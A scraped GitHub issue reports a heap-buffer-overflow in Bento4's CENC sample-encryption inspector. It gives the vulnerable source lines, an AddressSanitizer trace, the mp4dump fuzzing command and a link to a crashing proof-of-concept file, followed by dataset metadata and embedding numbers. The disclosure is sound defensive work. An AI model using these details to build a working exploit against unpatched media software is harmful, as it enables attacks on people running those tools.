/src/bento4/Source/C++/Core/Ap4List.h:353 #4 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #5 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #6 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #7 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #8 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #9 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #10 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #11 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #12 0x43f769 in main /src/bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350 #13 0x7f7d03b2b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x4434e8 in _start (/src/aflbuild/installed/bin/mp4dump+0x4434e8) 0x61300000dfee is located 0 bytes to the right of 366-byte region [0x61300000de80,0x61300000dfee) allocated by thread T0 here: #0 0x7f7d045066b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) #1 0x536f2f in AP4_DataBuffer::ReallocateBuffer(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x536f2f in AP4_DataBuffer::SetDataSize(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) Shadow bytes around the buggy address: 0x0c267fff9ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bc0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c267fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c267fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]fa fa 0x0c267fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==20093==ABORTING ``` ### others from fuzz project pwd-bento4-mp4dump-02 crash name pwd-bento4-mp4dump-02-00000034-20190811.mp4 Auto-generated by pyspider at 2019-08-11 19:37:41 please send email to [email protected] if you have any questions. [poc1.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640451/poc1.tar.gz)
A heap-buffer-overflow was discovered in AP4_CencSampleEncryption::DoInspectFields in Ap4CommonEncryption.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/430/comments
0
2019-09-23T02:16:44
2019-10-08T05:16:10Z
https://github.com/axiomatic-systems/Bento4/issues/430
496,866,994
430
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : A heap-buffer-overflow was discovered in AP4_CencSampleEncryption::DoInspectFields in Ap4CommonEncryption.cpp Issue date: --- start body --- # bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_CencSampleEncryption::[email protected]___heap-buffer-overflow ### description An issue was discovered in bento4 1.5.1.0, There is a/an heap-buffer-overflow in function AP4_CencSampleEncryption::DoInspectFields at Ap4CommonEncryption.cpp-3437 ### commandline mp4dump --verbosity 2 @@ ### source ```c 3433 info += 2; 3434 for (unsigned int j=0; j<num_entries; j++) { 3435 unsigned int bocd = AP4_BytesToUInt16BE(info); 3436 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of clear data", i, j); 3437 inspector.AddField(header, bocd); 3438 unsigned int boed = AP4_BytesToUInt32BE(info+2); 3439 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of encrypted data", i, j); 3440 inspector.AddField(header, boed); 3441 info += 6; 3442 } ``` ### bug report ```txt ================================================================= ==20093==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61300000dfee at pc 0x00000060256b bp 0x7ffdb67cdb90 sp 0x7ffdb67cdb80 READ of size 4 at 0x61300000dfee thread T0 #0 0x60256a in AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 #1 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #2 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #3 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #4 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #5 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #6 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #7 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #8 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #9 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #10 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #11 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #12 0x43f769 in main /src/bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350 #13 0x7f7d03b2b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x4434e8 in _start (/src/aflbuild/installed/bin/mp4dump+0x4434e8) 0x61300000dfee is located 0 bytes to the right of 366-byte region [0x61300000de80,0x61300000dfee) allocated by thread T0 here: #0 0x7f7d045066b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) #1 0x536f2f in AP4_DataBuffer::ReallocateBuffer(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x536f2f in AP4_DataBuffer::SetDataSize(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) Shadow bytes around the buggy address: 0x0c267fff9ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bc0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c267fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c267fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]fa fa 0x0c267fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==20093==ABORTING ``` ### others from fuzz project pwd-bento4-mp4dump-02 crash name pwd-bento4-mp4dump-02-00000034-20190811.mp4 Auto-generated by pyspider at 2019-08-11 19:37:41 please send email to [email protected] if you have any questions. [poc1.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640451/poc1.tar.gz) --- end body ---
5,852
[ -0.04485664516687393, 0.01762012019753456, -0.011154431849718094, 0.018471261486411095, 0.04201950505375862, 0.020083948969841003, -0.037360627204179764, 0.032970529049634933, -0.011244025081396103, 0.051277533173561096, -0.011020041070878506, 0.013140427879989147, 0.015395206399261951, 0.017575323581695557, -0.008496480993926525, 0.0033728342968970537, -0.003652815008535981, 0.0007508149719797075, -0.012573000974953175, 0.004076519049704075, 0.04482677951455116, -0.025683565065264702, 0.006917390041053295, 0.03056642785668373, -0.001468032249249518, 0.02359304204583168, -0.0013933706795796752, 0.00927296094596386, 0.0016136221820488572, 0.021338263526558876, -0.00007693636871408671, 0.026415247470140457, -0.015335476957261562, 0.008145572617650032, 0.031925268471241, 0.013110563158988953, 0.021054549142718315, 0.0652243047952652, 0.00036327497218735516, 0.0020382595248520374, 0.0006971519906073809, -0.07257100194692612, -0.024922017008066177, 0.019785303622484207, -0.009586540050804615, 0.014387276023626328, 0.00925802905112505, -0.012670060619711876, -0.03494159132242203, 0.0003609418054111302, 0.005334565881639719, -0.030148323625326157, -0.048380669206380844, -0.044767048209905624, 0.010527274571359158, -0.008787661790847778, 0.012782053090631962, 0.018187547102570534, 0.00252169300802052, 0.006096113473176956, -0.03237323835492134, -0.000927202810999006, 0.02038259617984295, 0.0323135070502758, 0.010467546060681343, 0.02792341075837612, -0.0005002322141081095, 0.0073093632236123085, -0.04139234870672226, 0.033567819744348526, -0.04187018424272537, -0.008578608743846416, 0.024250062182545662, 0.04055614024400711, 0.005704140290617943, -0.017067624256014824, 0.03473253920674324, 0.013267353177070618, -0.022368593141436577, 0.05390562117099762, -0.025788091123104095, 0.01770971342921257, -0.040944378823041916, 0.01039288379251957, 0.05008295178413391, 0.007787196896970272, -0.06976372748613358, -0.07579638063907623, -0.016321009024977684, -0.0349714569747448, 0.03228364139795303, 0.03186553716659546, 0.022756831720471382, 0.0020905225537717342, 0.008907119743525982, 0.01805315725505352, -0.027833815664052963, -0.017187083140015602, -0.06504511833190918, -0.005894527304917574, -0.02586275152862072, -0.014977101236581802, 0.0016761511797085404, 0.0038021381478756666, 0.011258957907557487, 0.003236577147617936, 0.011214161291718483, -0.01839659921824932, 0.02577315829694271, 0.1193389818072319, 0.004136248491704464, -0.0029080663807690144, 0.009422284550964832, 0.020935092121362686, 0.009340156801044941, 0.012237023562192917, -0.017470795661211014, -0.02511613629758358, -0.04808202013373375, -0.026280855759978294, 0.002891267416998744, -0.04192991182208061, 0.0016210883622989058, 0.0124012790620327, -0.024757761508226395, 0.05094902217388153, -0.010056907311081886, 0.006491819396615028, -0.02296588383615017, -0.03174607828259468, -0.011998106725513935, -0.02247311919927597, -0.013812381774187088, -0.0025776890106499195, 0.0018002759898081422, 0.0210694819688797, -0.016111956909298897, 0.04222855716943741, 0.023428786545991898, -0.0038189368788152933, -0.061760012060403824, -0.008765262551605701, 0.01687350496649742, 0.009661201387643814, -0.004961258266121149, -0.005513753741979599, 0.006133444141596556, 0.030730683356523514, -0.028520701453089714, -0.007802129257470369, -0.0034810935612767935, -0.024563642218708992, 0.023204801604151726, 0.013543600216507912, 0.04375165328383446, -0.009698531590402126, 0.026280855759978294, 0.03765927255153656, 0.009915050119161606, -0.018307005986571312, -0.002928598318248987, -0.031357839703559875, 0.029745150357484818, -0.03527010232210159, 0.004640213679522276, -0.03715157508850098, 0.026773622259497643, 0.0005604280740953982, -0.013730254024267197, 0.02483242191374302, 0.020905226469039917, -0.013528668321669102, 0.015499732457101345, 0.02517586573958397, -0.060207054018974304, -0.016440467908978462, 0.008317293599247932, 0.022756831720471382, -0.012692458927631378, -0.010482477955520153, -0.023100275546312332, 0.016843639314174652, 0.029745150357484818, -0.018307005986571312, 0.02539985068142414, 0.004834333434700966, 0.026937877759337425, -0.05085942894220352, 0.020218340680003166, -0.0024153003469109535, 0.002223046962171793, 0.0056145465932786465, 0.01653006114065647, -0.009579073637723923, 0.04348286986351013, -0.01702282764017582, -0.03320944681763649, -0.016111956909298897, 0.00490152882412076, 0.027161862701177597, 0.016813775524497032, -0.021636908873915672, -0.02993927150964737, 0.006170774810016155, -0.011729325167834759, -0.0018852035282179713, -0.024414317682385445, 0.05614546686410904, 0.04572271555662155, 0.009661201387643814, -0.030118457973003387, -0.020591648295521736, 0.01983010023832321, 0.03267188370227814, -0.022831493988633156, 0.0033914996311068535, -0.034672811627388, 0.006286500487476587, -0.038853857666254044, 0.001895469380542636, 0.01802329160273075, -0.007305630017071962, 0.007540814112871885, -0.017142286524176598, -0.03688279166817665, -0.012050369754433632, 0.005674276035279036, 0.03482213616371155, 0.013155360706150532, -0.006077447906136513, 0.0326121523976326, 0.005763869732618332, -0.03150716423988342, -0.014297681860625744, 0.015858108177781105, -0.01767984963953495, 0.005566016770899296, 0.00252169300802052, 0.008130639791488647, 0.004666345193982124, 0.007854392752051353, 0.027281321585178375, -0.021338263526558876, -0.031238380819559097, -0.00044913572492077947, 0.06576187163591385, -0.02284642681479454, -0.01730654202401638, -0.016380738466978073, 0.017127353698015213, -0.0026224860921502113, 0.0012011172948405147, 0.009347623214125633, 0.013946772553026676, 0.013640660792589188, -0.022577645257115364, 0.02000928856432438, 0.003387766657397151, -0.02505640685558319, -0.02281656116247177, 0.00955667532980442, -0.008481549099087715, -0.008578608743846416, -0.006439556367695332, 0.023085342720150948, -0.0163060761988163, -0.015768513083457947, 0.00010837586887646466, -0.04790283367037773, -0.04231815040111542, 0.03485199809074402, 0.0018264075042679906, -0.019725574180483818, -0.04300503805279732, -0.008630871772766113, 0.01106483768671751, 0.024100739508867264, 0.01076619140803814, 0.018650447949767113, -0.015738649293780327, -0.012222091667354107, 0.013969170860946178, -0.014962169341742992, -0.0037890723906457424, 0.011370950378477573, -0.01664952002465725, 0.006921123247593641, -0.01554452907294035, -0.02913292683660984, 0.012050369754433632, 0.00918336771428585, 0.028968671336770058, -0.07161533087491989, -0.0017704113852232695, -0.006073715165257454, 0.01879977248609066, -0.0158133115619421, 0.018471261486411095, -0.0285356342792511, 0.013439074158668518, -0.052083879709243774, -0.010288357734680176, -0.021651841700077057, 0.01621648296713829, -0.03969006612896919, 0.018650447949767113, -0.025280391797423363, 0.010258493013679981, -0.007171239238232374, -0.017933698371052742, 0.04130275547504425, -0.06140163540840149, -0.013125495985150337, -0.007831993512809277, -0.05106848105788231, -0.014753117226064205, -0.0028520701453089714, -0.00712644262239337, -0.03002886474132538, 0.032880935817956924, -0.03404565528035164, 0.03183567523956299, -0.009974779561161995, 0.014790447428822517, -0.0025590236764401197, -0.014596328139305115, -0.004382631275802851, 0.01653006114065647, -0.06504511833190918, 0.022458186373114586, -0.016754046082496643, -0.01730654202401638, -0.007257100194692612, -0.02692294493317604, -0.0022379790898412466, -0.024205265566706657, -0.021860893815755844, -0.013259886763989925, 0.006857661064714193, 0.0013261752901598811, -0.012057836167514324, 0.02999900095164776, 0.013565998524427414, -0.0012141830520704389, -0.01234154962003231, 0.007929054088890553, 0.02832658216357231, -0.016843639314174652, 0.010213696397840977, 0.000893605116289109, 0.0010919247288256884, 0.02147265337407589, 0.00620063953101635, 0.017470795661211014, 0.010781124234199524, -0.021174008026719093, -0.022950952872633934, 0.009280427359044552, 0.03183567523956299, -0.03022298403084278, -0.01067659817636013, -0.006279034074395895, -0.01314789429306984, 0.01820247992873192, -0.0060550495982170105, 0.006491819396615028, 0.0036154843401163816, 0.017127353698015213, -0.008055978454649448, 0.007951452396810055, -0.013707855716347694, 0.05614546686410904, -0.051277533173561096, 0.03255242481827736, 0.00579000124707818, -0.033627551048994064, -0.0030088594648987055, 0.021965419873595238, -0.04581231251358986, 0.010639267042279243, -0.032194048166275024, 0.021950487047433853, 0.03249269351363182, -0.05375629663467407, 0.009175901301205158, 0.000023142156351241283, -0.011482941918075085, 0.03756967931985855, -0.02922252006828785, -0.009892651811242104, -0.035001322627067566, 0.06534376740455627, -0.03745022043585777, -0.05850477144122124, -0.020457256585359573, 0.05106848105788231, -0.03527010232210159, -0.007578144781291485, 0.012707391753792763, -0.060207054018974304, 0.023578109219670296, -0.01673911325633526, 0.015947701409459114, -0.008615939877927303, 0.016544993966817856, 0.04847026243805885, 0.03234337270259857, -0.008003715425729752, 0.014058765023946762, -0.0006187573890201747, 0.04431908205151558, 0.02514600194990635, -0.007469885516911745, 0.011027507483959198, 0.044617727398872375, 0.024668168276548386, -0.0008478749077767134, 0.015223484486341476, -0.015163755044341087, 0.025369985029101372, -0.009063908830285072, 0.021188940852880478, 0.028057800605893135, 0.013125495985150337, 0.01730654202401638, 0.0316266231238842, -0.005032186862081289, 0.01120669487863779, 0.02755010314285755, -0.030417105183005333, 0.01067659817636013, 0.011288822628557682, -0.0014447005232796073, -0.014185689389705658, 0.00422584218904376, -0.05217347294092178, 0.0017918766243383288, -0.05118793994188309, -0.01997942291200161, -0.018157683312892914, -0.026445111259818077, 0.05336805805563927, -0.031238380819559097, -0.01618661917746067, 0.008466617204248905, -0.04348286986351013, -0.01618661917746067, -0.027087200433015823, -0.0065515488386154175, -0.014865109696984291, -0.035837531089782715, 0.028550567105412483, -0.010497409850358963, -0.007197370752692223, 0.00031287845922634006, -0.0032403101213276386, -0.012961240485310555, -0.014887508004903793, 0.02704240381717682, 0.025071339681744576, -0.006898724939674139, 0.028117530047893524, 0.00694725476205349, -0.007705069147050381, 0.04216882959008217, 0.01960611529648304, -0.019785303622484207, -0.025907548144459724, 0.0043341014534235, -0.022607509046792984, -0.0033821670804172754, 0.017127353698015213, 0.023294394835829735, 0.012498338706791401, 0.024070875719189644, 0.025011610239744186, 0.010639267042279243, -0.02316000498831272, -0.019023755565285683, -0.05742964521050453, 0.014073696918785572, -0.009452149271965027, -0.01696309819817543, 0.03034244291484356, 0.006861393805593252, -0.013394277542829514, -0.0006789532490074635, 0.024966813623905182, 0.005424159578979015, 0.005282302852720022, 0.009131104685366154, -0.03494159132242203, -0.008018647320568562, -0.02284642681479454, 0.0006019585416652262, -0.003915996756404638, -0.00673073623329401, 0.013782517053186893, 0.04067559912800789, 0.04345300793647766, 0.023264531046152115, -0.015036830678582191, 0.03643482178449631, -0.011385882273316383, 0.008645804598927498, -0.019083485007286072, -0.029147859662771225, 0.011400815099477768, -0.002189449267461896, -0.02542971447110176, -0.00328697357326746, -0.006562747992575169, -0.001982263522222638, -0.027654629200696945, -0.03165648505091667, -0.030461901798844337, -0.0041810451075434685, -0.0065590147860348225, -0.004024256020784378, 0.005969188641756773, -0.009131104685366154, -0.023802094161510468, 0.006562747992575169, 0.013610796071588993, 0.02442925050854683, 0.02144278958439827, 0.023130139335989952, -0.011960776522755623, 0.023727431893348694, -0.016978031024336815, 0.007092844694852829, 0.010467546060681343, -0.009168434888124466, 0.01440967433154583, -0.007279498502612114, 0.018038224428892136, -0.01195331010967493, 0.023324260488152504, -0.001364439376629889, -0.011893580667674541, -0.00941481813788414, 0.05739977955818176, -0.019845033064484596, 0.0021969154477119446, -0.050501056015491486, 0.02928224951028824, 0.03697238489985466, 0.018964026123285294, 0.01278951857239008, -0.0034157647751271725, 0.03159675747156143, 0.009564140811562538, -0.003639749251306057, 0.002747544087469578, 0.016604723408818245, 0.026310721412301064, -0.026504840701818466, 0.022950952872633934, 0.023831957951188087, 0.02371249906718731, -0.012490873225033283, -0.010348087176680565, 0.010803522542119026, 0.0005263637285679579, 0.016574857756495476, 0.01727667637169361, -0.004920194391161203, 0.026027007028460503, -0.021607045084238052, -0.004039188381284475, 0.021248670294880867, -0.00009636003233026713, 0.020651377737522125, -0.00031054526334628463, 0.0029565964359790087, 0.02984967641532421, -0.0037778730038553476, 0.001704149297438562, -0.011901047080755234, -0.016485264524817467, 0.012908977456390858, -0.012266888283193111, -0.004629014525562525, 0.0021297200582921505, 0.01693323440849781, -0.014521666802465916, 0.015104026533663273, -0.007973850704729557, -0.0018628049874678254, -0.027654629200696945, -0.00041017174953594804, -0.005360697396099567, -0.023727431893348694, -0.019247740507125854, 0.006312632001936436, -0.013222555629909039, 0.023951416835188866, 0.004789536818861961, 0.009131104685366154, 0.0037330761551856995, -0.017590254545211792, 0.042557068169116974, 0.010773657821118832, -0.02801300399005413, 0.0009603338548913598, 0.03903304412961006, -0.0012683126842603087, 0.016813775524497032, -0.040287356823682785, 0.03861493989825249, 0.014588861726224422, 0.008556210435926914, 0.051277533173561096, -0.009922516532242298, 0.013804915361106396, 0.005457757506519556, 0.019038688391447067, 0.010422748513519764, -0.007148840930312872, 0.010437681339681149, 0.006544082425534725, -0.05444318428635597, 0.03927196189761162, -0.019083485007286072, 0.017351338639855385, -0.004811935126781464, -0.006088647060096264, 0.006107312627136707, -0.008265030570328236, -0.023518379777669907, -0.03380673751235008, 0.04160140082240105, 0.006450755521655083, -0.019501589238643646, -0.026654163375496864, 0.014491802081465721, 0.03697238489985466, -0.006891258526593447, 0.008757797069847584, -0.014058765023946762, 0.00254035834223032, 0.0014866975834593177, -0.022174471989274025, 0.008429286070168018, -0.030043797567486763, 0.02153238281607628, 0.004729807376861572, 0.00040270559838972986, 0.035031188279390335, -0.007510949391871691, -0.0428258515894413, -0.005838531069457531, 0.000505831849295646, 0.011565069667994976, -0.004748472943902016, -0.0339859239757061, 0.03458321839570999, 0.036554280668497086, -0.012087700888514519, -0.02689308114349842, -0.011587468907237053, -0.03515064716339111, -0.019650913774967194, 0.027893545106053352, -0.001472698524594307, -0.008996713906526566, -0.03180580958724022, -0.006036384031176567, 0.021636908873915672, 0.02850577048957348, 0.0038749331142753363, -0.012520737946033478, -0.002607553731650114, 0.01587303914129734, -0.015604258514940739, -0.024294860661029816, 0.002760609844699502, 0.01845632866024971, -0.010407816618680954, -0.016918301582336426, -0.0014129693154245615, -0.01650019735097885, -0.01552959717810154, -0.010221162810921669, -0.0110499057918787, 0.01546986773610115, -0.002178249880671501, 0.008302361704409122, -0.003466161200776696, -0.04781324043869972, 0.026131533086299896, -0.014290215447545052, 0.04578244686126709, 0.018710177391767502, 0.0027008806355297565, -0.032194048166275024, 0.016634587198495865, -0.021517451852560043, -0.013737720437347889, -0.003079787828028202, -0.019845033064484596, 0.014133426360785961, -0.0037480085156857967, -0.007884256541728973, 0.015148823149502277, 0.03159675747156143, -0.010601935908198357, -0.0003201112849637866, 0.035061050206422806, -0.012923909351229668, -0.017037760466337204, 0.01000464428216219, -0.025817954912781715, 0.014111028052866459, 0.0009454015525989234, -0.010348087176680565, 0.0018786705331876874, -0.0055025541223585606, 0.0005963589064776897, -0.01546986773610115, -0.02023327350616455, -0.005834797862917185, -0.010527274571359158, -0.03479227051138878, -0.006775533314794302, 0.004823134280741215, -0.0032403101213276386, 0.009310292080044746, 0.018754974007606506, 0.011729325167834759, 0.0018497392302379012, -0.01187118235975504, 0.0111245671287179, 0.010527274571359158, -0.03768913820385933, 0.004240774549543858, 0.003863733960315585, -0.022488050162792206, 0.001611755695194006, 0.04515529051423073, 0.023727431893348694, 0.009817990474402905, 0.003068588674068451, -0.032940663397312164, 0.00490152882412076, -0.02147265337407589, -0.014439539052546024, 0.0014857642818242311, -0.015006965957581997, 0.00941481813788414, 0.008085843175649643, 0.012752188369631767, 0.008250098675489426, -0.04378151893615723, -0.014775515533983707, 0.006252902559936047, 0.03422484174370766, 0.015193619765341282, 0.007077912334352732, 0.019964491948485374, 0.009332690387964249, 0.01802329160273075, 0.011326152831315994, 0.005114314146339893, 0.021741434931755066, -0.0150293642655015, 0.0014941637637093663, -0.014454470947384834, 0.03156689181923866, 0.0029659289866685867, 0.012894045561552048, -0.022921087220311165, -0.0332990400493145, -0.0010891249403357506, 0.03028271347284317, -0.02316000498831272, 0.0023630373179912567, 0.013543600216507912, 0.020278070122003555, 0.024593506008386612, -0.028923874720931053, 0.01269992534071207, -0.02928224951028824, 0.007574411574751139, -0.00001798001176211983, -0.011863715946674347, 0.006058782804757357, -0.011744257993996143, 0.020143678411841393, 0.01960611529648304, -0.003156316000968218, 0.0016864171484485269, 0.023876754567027092, -0.0016285545425489545, 0.003555755130946636, -0.018949095159769058, -0.00007192004704847932, 0.0060475836507976055, -0.018665380775928497, -0.005084449891000986, 0.016828708350658417, 0.016828708350658417, -0.03320944681763649, -0.011587468907237053, 0.004472225438803434, -0.0015118959126994014, 0.010557139292359352, 0.011132033541798592, -0.022547779604792595, 0.008892187848687172, -0.012005573138594627, -0.019710641354322433, 0.015858108177781105, 0.008003715425729752, 0.002066257642582059, -0.010213696397840977, -0.009743329137563705, -0.010415282100439072, 0.013416675850749016, 0.0010284625459462404, -0.0036565482150763273, 0.000623890373390168, -0.04706662520766258, -0.03906290978193283, 0.021338263526558876, -0.018560854718089104, 0.0087428642436862, 0.024922017008066177, 0.003100319765508175, 0.002043859101831913, -0.00776479858905077, -0.012901511043310165, 0.005058318376541138, 0.044050298631191254, -0.006353695876896381, 0.02586275152862072, -0.003826403059065342, 0.00426317285746336, -0.018904298543930054, 0.038764264434576035, -0.018008358776569366, -0.008675669319927692, -0.05772829055786133, -0.004356499761343002, -0.0044274283573031425, -0.03159675747156143, -0.011893580667674541, 0.009862787090241909, 0.003081654431298375, -0.006775533314794302, 0.036554280668497086, 0.002792340936139226, -0.007645340170711279, 0.019994355738162994, 0.006484353449195623, 0.000601491890847683, -0.0209201592952013, -0.03983939066529274, 0.013916907832026482, -0.021741434931755066, 0.02577315829694271, 0.020397529006004333, -0.02172650396823883, 0.0002928131725639105, 0.005401761271059513, 0.0027344783302396536, 0.008160504512488842, -0.04160140082240105, -0.006443289574235678, -0.01552959717810154, -0.007966384291648865, -0.01075125951319933, 0.020069018006324768, 0.0015473600942641497, -0.04443853721022606, -0.019680777564644814, -0.00440503004938364, 0.008130639791488647, 0.012490873225033283, 0.041033972054719925, -0.01599249802529812, 0.004841799847781658, -0.002825938630849123, 0.010437681339681149, 0.01039288379251957, -0.04428921639919281, 0.020770836621522903, -0.011251491494476795, -0.049007825553417206, 0.0005669609527103603, 0.010557139292359352, 0.010452613234519958, -0.04187018424272537, -0.019158147275447845, 0.04661865532398224, 0.003671480342745781, -0.008399421349167824, -0.03524024039506912, -0.03374700993299484, -0.028281785547733307, 0.0002447497972752899, 0.007884256541728973, 0.02353331260383129, -0.00008644404442748055, -0.018157683312892914, 0.02212967537343502, 0.0316266231238842, 0.014028900302946568, -0.01277458667755127, 0.025817954912781715, 0.0041661132127046585, -0.024951880797743797, -0.010616868734359741, -0.03043203614652157, -0.02878948301076889, -0.0010555272456258535, -0.01593276858329773, 0.009317758493125439, -0.012938842177391052, 0.04957525059580803, -0.01508162822574377, 0.006473154295235872, -0.015678919851779938, 0.040317222476005554, 0.012602864764630795, -0.04446840286254883, -0.0270125400274992, 0.007201103959232569, -0.0011451211757957935, 0.012655128724873066, -0.007081645540893078, -0.031327974051237106, -0.010818454436957836, 0.01690336875617504, 0.014947237446904182, -0.006159575656056404, -0.024892151355743408, 0.020427392795681953, -0.017157217487692833, -0.03852534666657448, -0.008406887762248516, -0.011258957907557487, -0.00422584218904376, -0.00459914980456233, -0.005218840669840574, 0.00919829960912466, 0.006827796343713999, -0.015290680341422558, -0.021203871816396713, -0.004132515285164118, -0.020427392795681953, -0.025369985029101372, -0.008339691907167435, -0.009534277021884918, -0.026161398738622665, 0.04572271555662155, -0.021621977910399437, -0.012289286591112614, -0.009437216445803642, -0.004748472943902016, 0.026684029027819633, 0.01708255708217621, -0.008578608743846416, -0.04055614024400711, 0.02290615625679493, 0.021920623257756233, -0.023981280624866486, 0.017336405813694, -0.007417622487992048, -0.0013681724667549133, -0.009758261032402515, -0.017635051161050797, -0.005547351203858852, 0.0509788878262043, 0.018784839659929276, 0.024966813623905182, 0.018277140334248543, -0.014805380254983902, -0.018068088218569756, -0.011893580667674541, -0.015514664351940155, 0.006450755521655083, 0.0496051162481308, -0.015977565199136734, 0.01636580564081669, -0.0051180473528802395, 0.018501125276088715, 